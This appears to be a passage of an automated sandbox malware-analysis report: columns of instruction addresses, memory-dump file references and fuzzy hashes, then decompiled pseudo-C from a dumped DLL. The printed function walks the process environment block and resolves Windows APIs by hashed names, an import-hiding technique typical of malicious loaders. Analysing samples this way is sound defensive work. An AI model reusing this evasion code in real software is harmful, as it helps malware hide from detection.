                                                                                                                                                0x100119e7
                                                                                                                                                0x100119f6
                                                                                                                                                0x100119f8
                                                                                                                                                0x100119ff
                                                                                                                                                0x10011be9
                                                                                                                                                0x10011beb
                                                                                                                                                0x10011bee
                                                                                                                                                0x10011bf2
                                                                                                                                                0x00000000
                                                                                                                                                0x10011bf2
                                                                                                                                                0x10011a0e
                                                                                                                                                0x10011a19
                                                                                                                                                0x10011a20
                                                                                                                                                0x10011a23
                                                                                                                                                0x10011a25
                                                                                                                                                0x10011a28
                                                                                                                                                0x10011a2b
                                                                                                                                                0x10011a31
                                                                                                                                                0x10011a3f
                                                                                                                                                0x10011a4f
                                                                                                                                                0x10011a74
                                                                                                                                                0x10011a85
                                                                                                                                                0x10011a88
                                                                                                                                                0x10011a8a
                                                                                                                                                0x10011aee
                                                                                                                                                0x10011af1
                                                                                                                                                0x10011af1
                                                                                                                                                0x10011af3
                                                                                                                                                0x10011af6
                                                                                                                                                0x10011afa
                                                                                                                                                0x10011afa
                                                                                                                                                0x10011afe
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011b0b
                                                                                                                                                0x10011b11
                                                                                                                                                0x10011b45
                                                                                                                                                0x10011b4b
                                                                                                                                                0x10011b4d
                                                                                                                                                0x10011c1c
                                                                                                                                                0x10011c24
                                                                                                                                                0x10011c27
                                                                                                                                                0x10011c29
                                                                                                                                                0x10011c40
                                                                                                                                                0x10011c40
                                                                                                                                                0x10011c2b
                                                                                                                                                0x10011c2f
                                                                                                                                                0x10011c34
                                                                                                                                                0x10011c34
                                                                                                                                                0x10011c42
                                                                                                                                                0x10011c48
                                                                                                                                                0x10011b67
                                                                                                                                                0x10011b67
                                                                                                                                                0x10011b69
                                                                                                                                                0x10011b69
                                                                                                                                                0x10011b6b
                                                                                                                                                0x10011b6b
                                                                                                                                                0x10011b70
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011b72
                                                                                                                                                0x10011b73
                                                                                                                                                0x10011b76
                                                                                                                                                0x10011b79
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011b85
                                                                                                                                                0x10011b88
                                                                                                                                                0x10011b8a
                                                                                                                                                0x10011ba1
                                                                                                                                                0x10011ba1
                                                                                                                                                0x10011b8c
                                                                                                                                                0x10011b90
                                                                                                                                                0x10011b95
                                                                                                                                                0x10011b95
                                                                                                                                                0x10011bae
                                                                                                                                                0x10011bb1
                                                                                                                                                0x10011bba
                                                                                                                                                0x10011bbd
                                                                                                                                                0x10011be0
                                                                                                                                                0x10011be4
                                                                                                                                                0x00000000
                                                                                                                                                0x10011be4
                                                                                                                                                0x10011bc5
                                                                                                                                                0x10011bc5
                                                                                                                                                0x10011bd1
                                                                                                                                                0x10011bd4
                                                                                                                                                0x10011bdd
                                                                                                                                                0x00000000
                                                                                                                                                0x10011bdd
                                                                                                                                                0x10011b53
                                                                                                                                                0x10011b63
                                                                                                                                                0x10011b63
                                                                                                                                                0x10011b65
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011b5b
                                                                                                                                                0x10011b5d
                                                                                                                                                0x10011b5d
                                                                                                                                                0x00000000
                                                                                                                                                0x10011b63
                                                                                                                                                0x10011b13
                                                                                                                                                0x10011b1b
                                                                                                                                                0x10011b3b
                                                                                                                                                0x10011b1d
                                                                                                                                                0x10011b1d
                                                                                                                                                0x10011b25
                                                                                                                                                0x10011b2e
                                                                                                                                                0x10011b2e
                                                                                                                                                0x10011b25
                                                                                                                                                0x00000000
                                                                                                                                                0x10011b1b
                                                                                                                                                0x10011a8c
                                                                                                                                                0x10011a93
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011aa0
                                                                                                                                                0x10011aa6
                                                                                                                                                0x10011aab
                                                                                                                                                0x10011ab2
                                                                                                                                                0x10011ab6
                                                                                                                                                0x10011acb
                                                                                                                                                0x10011acd
                                                                                                                                                0x10011acf
                                                                                                                                                0x10011ad5
                                                                                                                                                0x10011ae3
                                                                                                                                                0x10011ae3
                                                                                                                                                0x10011ae9
                                                                                                                                                0x00000000
                                                                                                                                                0x10011ae9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011a33
                                                                                                                                                0x10011a33
                                                                                                                                                0x10011a33
                                                                                                                                                0x10011a34
                                                                                                                                                0x10011a37
                                                                                                                                                0x10011a3b
                                                                                                                                                0x00000000
                                                                                                                                                0x10011a51
                                                                                                                                                0x10011a54
                                                                                                                                                0x10011a57
                                                                                                                                                0x10011a60
                                                                                                                                                0x10011a63
                                                                                                                                                0x10011a64
                                                                                                                                                0x10011a66
                                                                                                                                                0x00000000
                                                                                                                                                0x100114a1
                                                                                                                                                0x100114a3
                                                                                                                                                0x100114a8
                                                                                                                                                0x100114b3
                                                                                                                                                0x100114c1
                                                                                                                                                0x100114d4
                                                                                                                                                0x100114e1
                                                                                                                                                0x100114ea
                                                                                                                                                0x100114ee
                                                                                                                                                0x100114f2
                                                                                                                                                0x1001153a
                                                                                                                                                0x1001153a
                                                                                                                                                0x1001153c
                                                                                                                                                0x10011543
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001155c
                                                                                                                                                0x10011564
                                                                                                                                                0x10011568
                                                                                                                                                0x1001157d
                                                                                                                                                0x10011581
                                                                                                                                                0x10011585
                                                                                                                                                0x1001158e
                                                                                                                                                0x10011594
                                                                                                                                                0x10011597
                                                                                                                                                0x1001159b
                                                                                                                                                0x100115a3
                                                                                                                                                0x100115a5
                                                                                                                                                0x100115a9
                                                                                                                                                0x100115b0
                                                                                                                                                0x100115b9
                                                                                                                                                0x100115b9
                                                                                                                                                0x100115bd
                                                                                                                                                0x100115d2
                                                                                                                                                0x100115e8
                                                                                                                                                0x100115f5
                                                                                                                                                0x100115f6
                                                                                                                                                0x100115f6
                                                                                                                                                0x100115f8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100115b2
                                                                                                                                                0x100115b2
                                                                                                                                                0x100115b2
                                                                                                                                                0x100115b3
                                                                                                                                                0x100115b4
                                                                                                                                                0x00000000
                                                                                                                                                0x100115b2
                                                                                                                                                0x10011577
                                                                                                                                                0x1001157b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100115fc
                                                                                                                                                0x100115fc
                                                                                                                                                0x100115fd
                                                                                                                                                0x10011600
                                                                                                                                                0x1001160a
                                                                                                                                                0x1001160a
                                                                                                                                                0x1001160e
                                                                                                                                                0x10011615
                                                                                                                                                0x10011670
                                                                                                                                                0x10011675
                                                                                                                                                0x100116c8
                                                                                                                                                0x100116c8
                                                                                                                                                0x100116cc
                                                                                                                                                0x100116d0
                                                                                                                                                0x100114fa
                                                                                                                                                0x100114fd
                                                                                                                                                0x10011502
                                                                                                                                                0x10011508
                                                                                                                                                0x1001150b
                                                                                                                                                0x10011512
                                                                                                                                                0x10011516
                                                                                                                                                0x1001151d
                                                                                                                                                0x10011526
                                                                                                                                                0x1001152a
                                                                                                                                                0x1001152e
                                                                                                                                                0x10011534
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011534
                                                                                                                                                0x100116da
                                                                                                                                                0x100116e6
                                                                                                                                                0x100116f1
                                                                                                                                                0x100116f8
                                                                                                                                                0x10011701
                                                                                                                                                0x1001170b
                                                                                                                                                0x1001170c
                                                                                                                                                0x1001171a
                                                                                                                                                0x1001171f
                                                                                                                                                0x10011720
                                                                                                                                                0x1001172d
                                                                                                                                                0x10011732
                                                                                                                                                0x10011744
                                                                                                                                                0x10011749
                                                                                                                                                0x1001174e
                                                                                                                                                0x10011760
                                                                                                                                                0x10011772
                                                                                                                                                0x10011777
                                                                                                                                                0x10011782
                                                                                                                                                0x10011789
                                                                                                                                                0x1001178e
                                                                                                                                                0x10011796
                                                                                                                                                0x1001179f
                                                                                                                                                0x1001179f
                                                                                                                                                0x100117ab
                                                                                                                                                0x100117b2
                                                                                                                                                0x100117be
                                                                                                                                                0x100117ca
                                                                                                                                                0x100117d8
                                                                                                                                                0x100117e9
                                                                                                                                                0x100117f0
                                                                                                                                                0x100117f5
                                                                                                                                                0x100117fe
                                                                                                                                                0x10011803
                                                                                                                                                0x10011805
                                                                                                                                                0x10011809
                                                                                                                                                0x1001180d
                                                                                                                                                0x1001181a
                                                                                                                                                0x10011827
                                                                                                                                                0x1001182b
                                                                                                                                                0x1001183f
                                                                                                                                                0x10011843
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011858
                                                                                                                                                0x1001185a
                                                                                                                                                0x10011862
                                                                                                                                                0x1001185f
                                                                                                                                                0x1001185f
                                                                                                                                                0x1001185f
                                                                                                                                                0x10011866
                                                                                                                                                0x10011868
                                                                                                                                                0x1001186e
                                                                                                                                                0x10011874
                                                                                                                                                0x100118d0
                                                                                                                                                0x100118d9
                                                                                                                                                0x100118dd
                                                                                                                                                0x100118ea
                                                                                                                                                0x100118f3
                                                                                                                                                0x100118f8
                                                                                                                                                0x100118fc
                                                                                                                                                0x100118ff
                                                                                                                                                0x10011960
                                                                                                                                                0x10011976
                                                                                                                                                0x10011981
                                                                                                                                                0x10011982
                                                                                                                                                0x10011983
                                                                                                                                                0x10011987
                                                                                                                                                0x1001198a
                                                                                                                                                0x10011c0a
                                                                                                                                                0x10011c0d
                                                                                                                                                0x10011c0d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001198a
                                                                                                                                                0x10011909
                                                                                                                                                0x10011919
                                                                                                                                                0x10011922
                                                                                                                                                0x1001192b
                                                                                                                                                0x10011934
                                                                                                                                                0x10011935
                                                                                                                                                0x10011936
                                                                                                                                                0x1001193b
                                                                                                                                                0x10011943
                                                                                                                                                0x1001194b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001194d
                                                                                                                                                0x1001187d
                                                                                                                                                0x10011882
                                                                                                                                                0x10011886
                                                                                                                                                0x10011886
                                                                                                                                                0x1001188a
                                                                                                                                                0x1001188d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100118ae
                                                                                                                                                0x100118b0
                                                                                                                                                0x100118b4
                                                                                                                                                0x100118b6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100118b8
                                                                                                                                                0x100118bf
                                                                                                                                                0x100118cb
                                                                                                                                                0x00000000
                                                                                                                                                0x100118cb
                                                                                                                                                0x10011892
                                                                                                                                                0x00000000
                                                                                                                                                0x10011990
                                                                                                                                                0x10011990
                                                                                                                                                0x10011991
                                                                                                                                                0x100119a1
                                                                                                                                                0x100119ad
                                                                                                                                                0x100119b6
                                                                                                                                                0x100119bf
                                                                                                                                                0x100119c8
                                                                                                                                                0x00000000
                                                                                                                                                0x100119c8
                                                                                                                                                0x10011677
                                                                                                                                                0x10011679
                                                                                                                                                0x1001167b
                                                                                                                                                0x10011680
                                                                                                                                                0x10011685
                                                                                                                                                0x10011698
                                                                                                                                                0x100116ae
                                                                                                                                                0x100116b7
                                                                                                                                                0x100116b8
                                                                                                                                                0x100116b8
                                                                                                                                                0x100116ba
                                                                                                                                                0x100116bb
                                                                                                                                                0x100116be
                                                                                                                                                0x100116c2
                                                                                                                                                0x00000000
                                                                                                                                                0x1001167b
                                                                                                                                                0x10011617
                                                                                                                                                0x10011621
                                                                                                                                                0x10011622
                                                                                                                                                0x10011622
                                                                                                                                                0x1001162f
                                                                                                                                                0x1001163b
                                                                                                                                                0x1001163d
                                                                                                                                                0x1001163f
                                                                                                                                                0x10011643
                                                                                                                                                0x10011653
                                                                                                                                                0x10011653
                                                                                                                                                0x1001165a
                                                                                                                                                0x1001165d
                                                                                                                                                0x1001165e
                                                                                                                                                0x10011662
                                                                                                                                                0x1001166c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001166c

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6bb1c58a8491a04b1b7cf55d076a4f7d4491392b2eab6815a4a95e8e134fd5d3
                                                                                                                                                • Instruction ID: b1410cd0d196bac93b6c766087412172e782a524cb2907c5cacc11c56020be0d
                                                                                                                                                • Opcode Fuzzy Hash: 6bb1c58a8491a04b1b7cf55d076a4f7d4491392b2eab6815a4a95e8e134fd5d3
                                                                                                                                                • Instruction Fuzzy Hash: 99327C745083418FD718DF28C881AAFB7E5FF94384F10892DF5958B2A6EB70E985CB52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E10011D58(intOrPtr __eax) {
                                                                                                                                                				void* _t72;
                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                				signed int _t75;
                                                                                                                                                				signed int _t76;
                                                                                                                                                				signed char _t84;
                                                                                                                                                				signed char _t86;
                                                                                                                                                				signed char _t89;
                                                                                                                                                				signed char _t92;
                                                                                                                                                				signed char _t95;
                                                                                                                                                				signed char* _t99;
                                                                                                                                                				void* _t113;
                                                                                                                                                				signed char _t114;
                                                                                                                                                				signed char _t116;
                                                                                                                                                				signed char _t118;
                                                                                                                                                				intOrPtr _t119;
                                                                                                                                                				signed char _t120;
                                                                                                                                                				signed char _t127;
                                                                                                                                                				signed char _t129;
                                                                                                                                                				signed char _t130;
                                                                                                                                                				signed char _t143;
                                                                                                                                                				signed char _t145;
                                                                                                                                                				signed char _t146;
                                                                                                                                                				signed int _t147;
                                                                                                                                                				signed char _t148;
                                                                                                                                                				void* _t151;
                                                                                                                                                				signed char _t155;
                                                                                                                                                				signed char _t159;
                                                                                                                                                				signed char _t165;
                                                                                                                                                				signed char _t166;
                                                                                                                                                				signed char _t167;
                                                                                                                                                				signed char _t168;
                                                                                                                                                				void* _t170;
                                                                                                                                                				void* _t171;
                                                                                                                                                				intOrPtr _t172;
                                                                                                                                                				signed char _t173;
                                                                                                                                                				intOrPtr _t174;
                                                                                                                                                				intOrPtr* _t175;
                                                                                                                                                				signed char _t176;
                                                                                                                                                				signed char _t177;
                                                                                                                                                				signed char _t178;
                                                                                                                                                				signed char _t179;
                                                                                                                                                				signed char* _t181;
                                                                                                                                                
                                                                                                                                                				_t119 = __eax;
                                                                                                                                                				_t143 =  *0x1001d21c; // 0x76470dcb
                                                                                                                                                				if(_t143 == 0x76470dcb) {
                                                                                                                                                					_t143 = 0;
                                                                                                                                                					 *0x1001d21c = 0;
                                                                                                                                                				}
                                                                                                                                                				if(_t119 != 0xfe338407) {
                                                                                                                                                					L4:
                                                                                                                                                					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                					if(_t119 != 0xa7e21d79) {
                                                                                                                                                						while(1) {
                                                                                                                                                							L10:
                                                                                                                                                							__eflags = _t143;
                                                                                                                                                							if(_t143 == 0) {
                                                                                                                                                								break;
                                                                                                                                                							}
                                                                                                                                                							_t72 = 0;
                                                                                                                                                							_t120 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							while(1) {
                                                                                                                                                								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
                                                                                                                                                								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t72 = _t72 + 1;
                                                                                                                                                								_t120 = _t120 + 0x10;
                                                                                                                                                								__eflags = _t72 - 0x10;
                                                                                                                                                								if(_t72 < 0x10) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								_t143 =  *(_t143 + 0x100);
                                                                                                                                                								goto L10;
                                                                                                                                                							}
                                                                                                                                                							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
                                                                                                                                                						}
                                                                                                                                                						__eflags = _t119 - 0x94e21d79;
                                                                                                                                                						if(_t119 != 0x94e21d79) {
                                                                                                                                                							_t74 =  *((intOrPtr*)(_t174 + 0xc));
                                                                                                                                                							_t175 =  *((intOrPtr*)(_t74 + 0xc));
                                                                                                                                                							_t181[4] =  *(_t74 + 0x10);
                                                                                                                                                							while(1) {
                                                                                                                                                								_t172 =  *((intOrPtr*)(_t175 + 0x30));
                                                                                                                                                								_t75 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								while(1) {
                                                                                                                                                									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
                                                                                                                                                									_t181[0x1c + _t75 * 2] = _t145;
                                                                                                                                                									__eflags = _t145;
                                                                                                                                                									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
                                                                                                                                                									if(_t145 == 0) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									_t75 = _t75 + 1;
                                                                                                                                                									__eflags = _t75 - _t146;
                                                                                                                                                									if(_t75 <= _t146) {
                                                                                                                                                										continue;
                                                                                                                                                									}
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								__eflags = _t146;
                                                                                                                                                								_t147 = 0;
                                                                                                                                                								if(_t146 <= 0) {
                                                                                                                                                									L34:
                                                                                                                                                									_t76 = E10014FD4( &(_t181[0x13c]), _t147);
                                                                                                                                                									__eflags = _t119 - (_t76 ^ 0x7af3da47);
                                                                                                                                                									if(_t119 == (_t76 ^ 0x7af3da47)) {
                                                                                                                                                										_t173 =  *(_t175 + 0x18);
                                                                                                                                                										__eflags = _t173;
                                                                                                                                                										if(_t173 == 0) {
                                                                                                                                                											L55:
                                                                                                                                                											return _t173;
                                                                                                                                                										}
                                                                                                                                                										L38:
                                                                                                                                                										_t148 =  *0x1001d2ec; // 0x0
                                                                                                                                                										__eflags = _t148 |  *0x1001d2ed;
                                                                                                                                                										if((_t148 |  *0x1001d2ed) == 0) {
                                                                                                                                                											_t176 =  *0x1001d21c; // 0x76470dcb
                                                                                                                                                											__eflags = _t176;
                                                                                                                                                											if(_t176 == 0) {
                                                                                                                                                												 *0x1001d2ec = 1;
                                                                                                                                                												_t177 = E100135F4(0x104);
                                                                                                                                                												__eflags = _t177;
                                                                                                                                                												if(_t177 == 0) {
                                                                                                                                                													_t177 = 0;
                                                                                                                                                													__eflags = 0;
                                                                                                                                                													L62:
                                                                                                                                                													 *0x1001d21c = _t177;
                                                                                                                                                													 *0x1001d214 = E10013044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
                                                                                                                                                													 *0x1001d2ec = 0;
                                                                                                                                                													L45:
                                                                                                                                                													_t151 = 0;
                                                                                                                                                													_t165 = 0;
                                                                                                                                                													__eflags = 0;
                                                                                                                                                													while(1) {
                                                                                                                                                														__eflags =  *(_t165 + _t177 + 8);
                                                                                                                                                														if( *(_t165 + _t177 + 8) == 0) {
                                                                                                                                                															break;
                                                                                                                                                														}
                                                                                                                                                														_t151 = _t151 + 1;
                                                                                                                                                														_t165 = _t165 + 0x10;
                                                                                                                                                														__eflags = _t151 - 0x10;
                                                                                                                                                														if(_t151 < 0x10) {
                                                                                                                                                															continue;
                                                                                                                                                														}
                                                                                                                                                														_t84 = E100135F4(0x104);
                                                                                                                                                														_t181[4] = _t84;
                                                                                                                                                														__eflags =  *_t181;
                                                                                                                                                														if( *_t181 == 0) {
                                                                                                                                                															 *_t181 = 0;
                                                                                                                                                															L53:
                                                                                                                                                															 *( *_t181 + 0xc) = _t173;
                                                                                                                                                															E1000D03C( *_t181,  &(_t181[0x1c]));
                                                                                                                                                															_t155 =  *_t181;
                                                                                                                                                															 *((intOrPtr*)(_t155 + 8)) = _t119;
                                                                                                                                                															 *(_t177 + 0x100) = _t155;
                                                                                                                                                															goto L55;
                                                                                                                                                														}
                                                                                                                                                														_t167 = _t84;
                                                                                                                                                														_t86 = 0x10;
                                                                                                                                                														do {
                                                                                                                                                															_t181[0x13c] = _t86;
                                                                                                                                                															E1000CFC8(_t167, 0);
                                                                                                                                                															 *((intOrPtr*)(_t167 + 8)) = 0;
                                                                                                                                                															 *((intOrPtr*)(_t167 + 0xc)) = 0;
                                                                                                                                                															_t167 = _t167 + 0x10;
                                                                                                                                                															_t86 = _t181[0x138] - 1;
                                                                                                                                                															__eflags = _t86;
                                                                                                                                                														} while (_t86 != 0);
                                                                                                                                                														 *( *_t181 + 0x100) = 0;
                                                                                                                                                														goto L53;
                                                                                                                                                													}
                                                                                                                                                													_t166 = _t165 + _t177;
                                                                                                                                                													__eflags = _t166;
                                                                                                                                                													 *(_t166 + 0xc) = _t173;
                                                                                                                                                													E1000D03C(_t166,  &(_t181[0x1c]));
                                                                                                                                                													 *((intOrPtr*)(_t166 + 8)) = _t119;
                                                                                                                                                													goto L55;
                                                                                                                                                												}
                                                                                                                                                												_t168 = _t177;
                                                                                                                                                												_t89 = 0x10;
                                                                                                                                                												do {
                                                                                                                                                													_t181[4] = _t89;
                                                                                                                                                													E1000CFC8(_t168, 0);
                                                                                                                                                													 *((intOrPtr*)(_t168 + 8)) = 0;
                                                                                                                                                													 *((intOrPtr*)(_t168 + 0xc)) = 0;
                                                                                                                                                													_t168 = _t168 + 0x10;
                                                                                                                                                													_t89 =  *_t181 - 1;
                                                                                                                                                													__eflags = _t89;
                                                                                                                                                												} while (_t89 != 0);
                                                                                                                                                												 *(_t177 + 0x100) = 0;
                                                                                                                                                												goto L62;
                                                                                                                                                											}
                                                                                                                                                											_t159 =  *(_t176 + 0x100);
                                                                                                                                                											while(1) {
                                                                                                                                                												__eflags = _t159;
                                                                                                                                                												if(_t159 == 0) {
                                                                                                                                                													goto L45;
                                                                                                                                                												}
                                                                                                                                                												_t177 = _t159;
                                                                                                                                                												_t159 =  *(_t159 + 0x100);
                                                                                                                                                											}
                                                                                                                                                											goto L45;
                                                                                                                                                										}
                                                                                                                                                										__eflags = _t119 - 0xfe338407;
                                                                                                                                                										if(_t119 == 0xfe338407) {
                                                                                                                                                											 *0x1001d220 = _t173;
                                                                                                                                                										}
                                                                                                                                                										goto L55;
                                                                                                                                                									}
                                                                                                                                                									__eflags = _t175 - _t181[4];
                                                                                                                                                									if(_t175 != _t181[4]) {
                                                                                                                                                										_t175 =  *_t175;
                                                                                                                                                										continue;
                                                                                                                                                									}
                                                                                                                                                									L36:
                                                                                                                                                									_t173 = 0;
                                                                                                                                                									goto L55;
                                                                                                                                                								}
                                                                                                                                                								_t92 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								while(1) {
                                                                                                                                                									_t126 =  *((char*)(_t172 + _t147 * 2));
                                                                                                                                                									 *_t181 = _t92;
                                                                                                                                                									_t39 = _t126 - 0x41; // -81
                                                                                                                                                									__eflags = _t39 - 0x19;
                                                                                                                                                									_t40 = _t126 + 0x20; // 0x10
                                                                                                                                                									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
                                                                                                                                                									_t181[_t147 + 0x13c] = _t127;
                                                                                                                                                									_t95 =  *_t181;
                                                                                                                                                									__eflags = _t127;
                                                                                                                                                									if(_t127 == 0) {
                                                                                                                                                										goto L34;
                                                                                                                                                									}
                                                                                                                                                									_t92 = _t95 + 1;
                                                                                                                                                									_t147 = _t147 + 1;
                                                                                                                                                									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
                                                                                                                                                									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
                                                                                                                                                										continue;
                                                                                                                                                									}
                                                                                                                                                									goto L34;
                                                                                                                                                								}
                                                                                                                                                								goto L34;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						_t170 = E10019A00();
                                                                                                                                                						_t178 = 0;
                                                                                                                                                						while(1) {
                                                                                                                                                							_t129 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
                                                                                                                                                							__eflags = _t129;
                                                                                                                                                							if(_t129 == 0) {
                                                                                                                                                								goto L16;
                                                                                                                                                							}
                                                                                                                                                							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
                                                                                                                                                							__eflags = _t116;
                                                                                                                                                							if(_t116 != 0) {
                                                                                                                                                								goto L36;
                                                                                                                                                							}
                                                                                                                                                							L16:
                                                                                                                                                							_t99 =  &(_t181[0x120]);
                                                                                                                                                							_t173 =  *_t99;
                                                                                                                                                							_t130 = _t99[8];
                                                                                                                                                							__eflags = _t173 - _t170;
                                                                                                                                                							if(_t173 > _t170) {
                                                                                                                                                								L13:
                                                                                                                                                								_t178 = _t178 + _t130;
                                                                                                                                                								__eflags = _t178;
                                                                                                                                                								continue;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t130 + _t173 - _t170;
                                                                                                                                                							if(_t130 + _t173 <= _t170) {
                                                                                                                                                								goto L13;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t173;
                                                                                                                                                							if(_t173 == 0) {
                                                                                                                                                								goto L55;
                                                                                                                                                							}
                                                                                                                                                							E1000F5A8( &(_t181[0x10]), 0x400);
                                                                                                                                                							_t171 = E1000F4E0( &(_t181[0x10]), 0);
                                                                                                                                                							_t179 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
                                                                                                                                                							__eflags = _t179;
                                                                                                                                                							if(_t179 == 0) {
                                                                                                                                                								L21:
                                                                                                                                                								E1000D000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
                                                                                                                                                								__eflags = E1000D210( &(_t181[8]), 0x5c);
                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                									_push(0x5c);
                                                                                                                                                									E1000D650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
                                                                                                                                                									E1000D03C( &(_t181[8]), _t181[0x1bc]);
                                                                                                                                                									E1000D020( &(_t181[0x1bc]));
                                                                                                                                                								}
                                                                                                                                                								E1000DE70( &(_t181[0x20]), _t181[4], 0);
                                                                                                                                                								E1000D020( &(_t181[4]));
                                                                                                                                                								L24:
                                                                                                                                                								E1000F678( &(_t181[0xc]));
                                                                                                                                                								goto L38;
                                                                                                                                                							}
                                                                                                                                                							 *_t181 = E1000F4E0( &(_t181[0x10]), 0);
                                                                                                                                                							_t113 = E1000F4F0( &(_t181[0xc]));
                                                                                                                                                							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
                                                                                                                                                							__eflags = _t114;
                                                                                                                                                							if(_t114 != 0) {
                                                                                                                                                								goto L24;
                                                                                                                                                							}
                                                                                                                                                							goto L21;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					return  *((intOrPtr*)(_t174 + 8));
                                                                                                                                                				} else {
                                                                                                                                                					_t118 =  *0x1001d220; // 0xe86b6198
                                                                                                                                                					if(_t118 != 0xe86b6198) {
                                                                                                                                                						return _t118;
                                                                                                                                                					}
                                                                                                                                                					goto L4;
                                                                                                                                                				}
                                                                                                                                                			}













































                                                                                                                                                0x10011d62
                                                                                                                                                0x10011d64
                                                                                                                                                0x10011d70
                                                                                                                                                0x10011d72
                                                                                                                                                0x10011d74
                                                                                                                                                0x10011d74
                                                                                                                                                0x10011d80
                                                                                                                                                0x10011d92
                                                                                                                                                0x10011d98
                                                                                                                                                0x10011da1
                                                                                                                                                0x10011dc8
                                                                                                                                                0x10011dc8
                                                                                                                                                0x10011dc8
                                                                                                                                                0x10011dca
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011dab
                                                                                                                                                0x10011dad
                                                                                                                                                0x10011dad
                                                                                                                                                0x10011daf
                                                                                                                                                0x10011daf
                                                                                                                                                0x10011db3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011db9
                                                                                                                                                0x10011dba
                                                                                                                                                0x10011dbd
                                                                                                                                                0x10011dc0
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011dc2
                                                                                                                                                0x00000000
                                                                                                                                                0x10011dc2
                                                                                                                                                0x00000000
                                                                                                                                                0x100120f1
                                                                                                                                                0x10011dcc
                                                                                                                                                0x10011dd2
                                                                                                                                                0x10011efe
                                                                                                                                                0x10011f04
                                                                                                                                                0x10011f07
                                                                                                                                                0x10011f10
                                                                                                                                                0x10011f10
                                                                                                                                                0x10011f13
                                                                                                                                                0x10011f13
                                                                                                                                                0x10011f15
                                                                                                                                                0x10011f15
                                                                                                                                                0x10011f19
                                                                                                                                                0x10011f1e
                                                                                                                                                0x10011f20
                                                                                                                                                0x10011f24
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f26
                                                                                                                                                0x10011f27
                                                                                                                                                0x10011f29
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f29
                                                                                                                                                0x10011f2b
                                                                                                                                                0x10011f2f
                                                                                                                                                0x10011f30
                                                                                                                                                0x10011f62
                                                                                                                                                0x10011f69
                                                                                                                                                0x10011f73
                                                                                                                                                0x10011f75
                                                                                                                                                0x10011f84
                                                                                                                                                0x10011f87
